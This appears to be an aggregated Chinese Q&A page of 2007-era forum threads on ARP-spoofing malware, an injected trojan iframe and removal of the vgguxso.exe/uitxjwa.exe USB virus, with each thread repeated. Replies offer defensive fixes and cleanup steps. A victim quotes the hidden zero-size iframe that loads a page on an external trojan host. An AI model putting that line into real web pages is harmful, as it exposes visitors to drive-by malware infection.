当前位置: 操作系统/服务器>windows
本页文章导读:
▪加急服务器被攻击,网页上会自动加上木马代码:"yn52.net/admin/kam.htm."该怎么处理 加急!!服务器被攻击,网页上会自动加上木马代码:"...yn52.net/admin/kam.htm..."今日打开我网页,发现有木马,代码:“ <iframe src=http://yn52.net/admin/kam.htm width=20 height=0 frameborder=0> .........
▪ 关于ARP攻击,该怎么解决 关于ARP攻击时不时机子谈出,你正在使用ARP欺骗性攻击,是怎么回事,怎么解决呢?下载个ARP专杀!
Anti ARP Sniffer
装了局域网管理工具也可能有这样的提示的。 ......
▪ 怎么清除vgguxso.exe 和 uitxjwa.exe 病毒 如何清除vgguxso.exe 和 uitxjwa.exe 病毒标题中所指的是一个病毒的两个组成部分,这种病毒会完全屏蔽几乎所有涉及杀毒和清除恶意程序的软件,并且不能进入安全模式 在网上用baidu搜到如下.........
[1]加急服务器被攻击,网页上会自动加上木马代码:"yn52.net/admin/kam.htm."该怎么处理
来源: 互联网 发布时间: 2014-02-18
加急!!服务器被攻击,网页上会自动加上木马代码:"...yn52.net/admin/kam.htm..."
今日打开我网页,发现有木马,代码:“ <iframe src=http://yn52.net/admin/kam.htm width=20 height=0 frameborder=0> </iframe> ”
可是发现网页没有被修改,应该是我的服务器被攻击了。
可是我找不到这个代码在哪里,搜索了注册表也没有。
第一次碰上这个,请指教!万分感谢!!!
联系我.我给你解决 你中的是arp的病毒
QQ:3711493
MSN:N0dYrOOt@hotmail.com
Xy4Ever(邪恶漫步者) ( ) 信誉:99 Blog 加为好友 2007-6-20 16:02:01 得分: 0
ARP病毒,很明显,我们这前几天也是
Top
XiongFu(雄霸天下) ( ) 信誉:100 Blog 加为好友 2007-6-21 14:22:46 得分: 0
下载antiarp将计算机都装一下防火墙
跟踪分析得到毒源
进行强制杀毒
Top
hoverlees(好棒) ( ) 信誉:100 Blog 加为好友 2007-6-28 21:58:28 得分: 0
服务器中毒啦,熊猫烧香也喜欢在别人的网页里加iframe
Top
是网页木马,不过,它是以ARP攻击传输的~中招之后,会自己连到某木马网站,下载大量木马至你本机;局域网内一台中的话,所有机子都这样;
这些木马用360安全卫士最新版绝大部份可以查杀,都是盗号的(呀呀个呸)~~
1.用nbtscan工具扫描局域网内计算机IP与MAC对应表,找出病源;(假如,你有MAC-IP对应表的话)
2.在路由器上绑定MAC与IP地址,(假如你的路由器支持的话)
3.如路由器不支持,则在客户机上编写批处理,开机自动运行,内容为:
@echo off
arp -d
arp -s 网关 MAC
exit
4.省心的办法,安装AntiARP网络版,不过,客户端要在ADMINI模式下才能运行~~
5.:“ <iframe src=http://yn52.net/admin/kam.htm width=20 height=0 Frameborder=0> </iframe> ”打开的是空白页吧,当然,宽和高都为0,跟我这一模一样。
6.问我为啥这么清楚?因为我这里前段时间刚中过,网络已经恢复好了。。
小妹明确达告诉你,你的服务器没有被攻击,以下来自国家计算机病毒防止中心:
国家计算机病毒应急处理中心通过对互联网的监测发现,近期一些局域网用户遭受了“ARP地址欺骗”病毒新变种的感染,同时也接到了一些用户的上报。
该病毒变种除具备以往ARP病毒发作的特征,诸如:局域网内部分计算机不能正常上网,或是所有计算机均不能上网,还有无法打开Web网页或打开Web网页速度较慢以及局域网连接时断时续并且网速较慢等现象以外,它还会向局域网内发送伪造的ARP欺骗广播,并将受感染的计算机系统伪装成局域网网关,当局域网中的计算机系统发出访问Web网页请求的时候,伪装成网关的计算机系统会把Web网页下载下来并在其中添加一段恶意地址代码一并发送给发出请求的计算机,造成该计算机系统访问Web网站时会主动连接该恶意网址。如果操作系统存在漏洞,就会在访问的计算机系统中植入木马程序,使得计算机系统遭到进一步的破坏,最终导致整个局域网成为“僵尸网络”。
专家提醒:
针对该病毒变种,国家计算机病毒应急处理中心建议广大计算机用户采取如下防范措施:
1、立即升级操作系统中的防病毒软件和防火墙,同时打开“实时监控”功能,实时地拦截来自局域网络上的各种ARP病毒变种。
2、立即下载微软MS06-014和MS07-017两个系统漏洞补丁程序,将补丁程序安装到局
域网络中存在这两个漏洞的计算机系统中,防止病毒变种的感染和传播。
今日打开我网页,发现有木马,代码:“ <iframe src=http://yn52.net/admin/kam.htm width=20 height=0 frameborder=0> </iframe> ”
可是发现网页没有被修改,应该是我的服务器被攻击了。
可是我找不到这个代码在哪里,搜索了注册表也没有。
第一次碰上这个,请指教!万分感谢!!!
联系我.我给你解决 你中的是arp的病毒
QQ:3711493
MSN:N0dYrOOt@hotmail.com
Xy4Ever(邪恶漫步者) ( ) 信誉:99 Blog 加为好友 2007-6-20 16:02:01 得分: 0
ARP病毒,很明显,我们这前几天也是
Top
XiongFu(雄霸天下) ( ) 信誉:100 Blog 加为好友 2007-6-21 14:22:46 得分: 0
下载antiarp将计算机都装一下防火墙
跟踪分析得到毒源
进行强制杀毒
Top
hoverlees(好棒) ( ) 信誉:100 Blog 加为好友 2007-6-28 21:58:28 得分: 0
服务器中毒啦,熊猫烧香也喜欢在别人的网页里加iframe
Top
是网页木马,不过,它是以ARP攻击传输的~中招之后,会自己连到某木马网站,下载大量木马至你本机;局域网内一台中的话,所有机子都这样;
这些木马用360安全卫士最新版绝大部份可以查杀,都是盗号的(呀呀个呸)~~
1.用nbtscan工具扫描局域网内计算机IP与MAC对应表,找出病源;(假如,你有MAC-IP对应表的话)
2.在路由器上绑定MAC与IP地址,(假如你的路由器支持的话)
3.如路由器不支持,则在客户机上编写批处理,开机自动运行,内容为:
@echo off
arp -d
arp -s 网关 MAC
exit
4.省心的办法,安装AntiARP网络版,不过,客户端要在ADMINI模式下才能运行~~
5.:“ <iframe src=http://yn52.net/admin/kam.htm width=20 height=0 Frameborder=0> </iframe> ”打开的是空白页吧,当然,宽和高都为0,跟我这一模一样。
6.问我为啥这么清楚?因为我这里前段时间刚中过,网络已经恢复好了。。
小妹明确达告诉你,你的服务器没有被攻击,以下来自国家计算机病毒防止中心:
国家计算机病毒应急处理中心通过对互联网的监测发现,近期一些局域网用户遭受了“ARP地址欺骗”病毒新变种的感染,同时也接到了一些用户的上报。
该病毒变种除具备以往ARP病毒发作的特征,诸如:局域网内部分计算机不能正常上网,或是所有计算机均不能上网,还有无法打开Web网页或打开Web网页速度较慢以及局域网连接时断时续并且网速较慢等现象以外,它还会向局域网内发送伪造的ARP欺骗广播,并将受感染的计算机系统伪装成局域网网关,当局域网中的计算机系统发出访问Web网页请求的时候,伪装成网关的计算机系统会把Web网页下载下来并在其中添加一段恶意地址代码一并发送给发出请求的计算机,造成该计算机系统访问Web网站时会主动连接该恶意网址。如果操作系统存在漏洞,就会在访问的计算机系统中植入木马程序,使得计算机系统遭到进一步的破坏,最终导致整个局域网成为“僵尸网络”。
专家提醒:
针对该病毒变种,国家计算机病毒应急处理中心建议广大计算机用户采取如下防范措施:
1、立即升级操作系统中的防病毒软件和防火墙,同时打开“实时监控”功能,实时地拦截来自局域网络上的各种ARP病毒变种。
2、立即下载微软MS06-014和MS07-017两个系统漏洞补丁程序,将补丁程序安装到局
域网络中存在这两个漏洞的计算机系统中,防止病毒变种的感染和传播。
[2] 关于ARP攻击,该怎么解决
来源: 互联网 发布时间: 2014-02-18
关于ARP攻击
时不时机子谈出,你正在使用ARP欺骗性攻击,是怎么回事,怎么解决呢?
下载个ARP专杀!
Anti ARP Sniffer
装了局域网管理工具也可能有这样的提示的。
时不时机子谈出,你正在使用ARP欺骗性攻击,是怎么回事,怎么解决呢?
下载个ARP专杀!
Anti ARP Sniffer
装了局域网管理工具也可能有这样的提示的。
[3] 怎么清除vgguxso.exe 和 uitxjwa.exe 病毒
来源: 互联网 发布时间: 2014-02-18
如何清除vgguxso.exe 和 uitxjwa.exe 病毒
标题中所指的是一个病毒的两个组成部分,这种病毒会完全屏蔽几乎所有涉及杀毒和清除恶意程序的软件,并且不能进入安全模式
在网上用baidu搜到如下清除方法,但也不能成功清除,原因请看最后
“这几天碰到一个顽固的病毒
公司很多机器都中毒了,最主要的传播途径就是U盘
中毒的机器全部杀毒软件不能使用,并且进程里面多出来两个进程 vgguxso.exe 和 uitxjwa.exe
由于杀毒软件全部失效,甚至360安全卫士,卡卡,也不能幸免。所以只能手动杀毒了
下面把我的手动清除方法说一下
第一步:最好是进安全模式,确实进不去也没关系。首先关掉上面说的两个进程。确定没有再次运行!
第二步:把文件夹属性设置为显示所有文件并且去掉隐藏系统文件前的对号。
第三步:打开C盘!(切记一定要先开C盘,因为每个盘符下面都有病毒,只有C盘根目录下没有。)删除 C:\Program Files下的 meex.exe 和 vmhrlbm.inf
第四步:删除C:\Program Files\Common Files\System下的 vgguxso.exe 和 autorun.inf
第五部:删除C:\Program Files\Common Files\Microsoft Shared 下的 uitxjwa.exe 和 autorun.inf
到这里,C盘下的病毒清理完毕,开始清理各个分区的病毒
第六步:切记!这时要从文件夹的地址栏直接选择各个分区的盘符,不要直接点击我的电脑里的盘符(会再次运行病毒),然后把每个盘符下的 vgguxso.exe 和 autorun.inf 删除,到这里所有的病毒都清理完毕。
第七步:把注册表内的病毒自启动项目删除,或者 运行 msconfig 去掉他们的自启动项。恢复你的杀毒软件,重新启动机器。
到这里为止,你所有的杀毒软件就可以都正常工作了。如果不放心,再用杀毒软件杀一遍吧:)”
以上为baidu到解决方法,但按其所指不能成功清除,原因如下:首先不能进入安全模式,这是最最关键的;其次文中所说不能进入安全模式没有关系其实大有关系,因为在正常模式下,根本不能关闭两个进程,且修改“文件夹选项”失败,也就是说在常模式下不能看到隐含文件,所以方案中的办法行不通了;第三,在前两种方法不能奏效的情况下,本人用光盘启动进入纯dos状态(没学过dos的恐怕不会用了),用attrib程序修改3个病毒程序的属性后,成功删除,但却始终找不到方案中所指的autorun.inf,无奈再次进windows操作,结果前功尽弃。
所以,我想在这里找高手帮忙,给一个能彻底解决的方案!
进入DOS后用你的百度搜到的方法查到(如是以盘是NTFS格式,则需要NTFSDOS工具):
用 dir /a显示所有文件及文伯夹;
用attrib -s -h-r-a掉除属性,Del之
听你的描述,有点像七位随机数病毒:
详情请看360BBS贴:http://bbs.360safe.com/archiver/?tid-216440.html
标题中所指的是一个病毒的两个组成部分,这种病毒会完全屏蔽几乎所有涉及杀毒和清除恶意程序的软件,并且不能进入安全模式
在网上用baidu搜到如下清除方法,但也不能成功清除,原因请看最后
“这几天碰到一个顽固的病毒
公司很多机器都中毒了,最主要的传播途径就是U盘
中毒的机器全部杀毒软件不能使用,并且进程里面多出来两个进程 vgguxso.exe 和 uitxjwa.exe
由于杀毒软件全部失效,甚至360安全卫士,卡卡,也不能幸免。所以只能手动杀毒了
下面把我的手动清除方法说一下
第一步:最好是进安全模式,确实进不去也没关系。首先关掉上面说的两个进程。确定没有再次运行!
第二步:把文件夹属性设置为显示所有文件并且去掉隐藏系统文件前的对号。
第三步:打开C盘!(切记一定要先开C盘,因为每个盘符下面都有病毒,只有C盘根目录下没有。)删除 C:\Program Files下的 meex.exe 和 vmhrlbm.inf
第四步:删除C:\Program Files\Common Files\System下的 vgguxso.exe 和 autorun.inf
第五部:删除C:\Program Files\Common Files\Microsoft Shared 下的 uitxjwa.exe 和 autorun.inf
到这里,C盘下的病毒清理完毕,开始清理各个分区的病毒
第六步:切记!这时要从文件夹的地址栏直接选择各个分区的盘符,不要直接点击我的电脑里的盘符(会再次运行病毒),然后把每个盘符下的 vgguxso.exe 和 autorun.inf 删除,到这里所有的病毒都清理完毕。
第七步:把注册表内的病毒自启动项目删除,或者 运行 msconfig 去掉他们的自启动项。恢复你的杀毒软件,重新启动机器。
到这里为止,你所有的杀毒软件就可以都正常工作了。如果不放心,再用杀毒软件杀一遍吧:)”
以上为baidu到解决方法,但按其所指不能成功清除,原因如下:首先不能进入安全模式,这是最最关键的;其次文中所说不能进入安全模式没有关系其实大有关系,因为在正常模式下,根本不能关闭两个进程,且修改“文件夹选项”失败,也就是说在常模式下不能看到隐含文件,所以方案中的办法行不通了;第三,在前两种方法不能奏效的情况下,本人用光盘启动进入纯dos状态(没学过dos的恐怕不会用了),用attrib程序修改3个病毒程序的属性后,成功删除,但却始终找不到方案中所指的autorun.inf,无奈再次进windows操作,结果前功尽弃。
所以,我想在这里找高手帮忙,给一个能彻底解决的方案!
进入DOS后用你的百度搜到的方法查到(如是以盘是NTFS格式,则需要NTFSDOS工具):
用 dir /a显示所有文件及文伯夹;
用attrib -s -h-r-a掉除属性,Del之
听你的描述,有点像七位随机数病毒:
详情请看360BBS贴:http://bbs.360safe.com/archiver/?tid-216440.html
最新技术文章: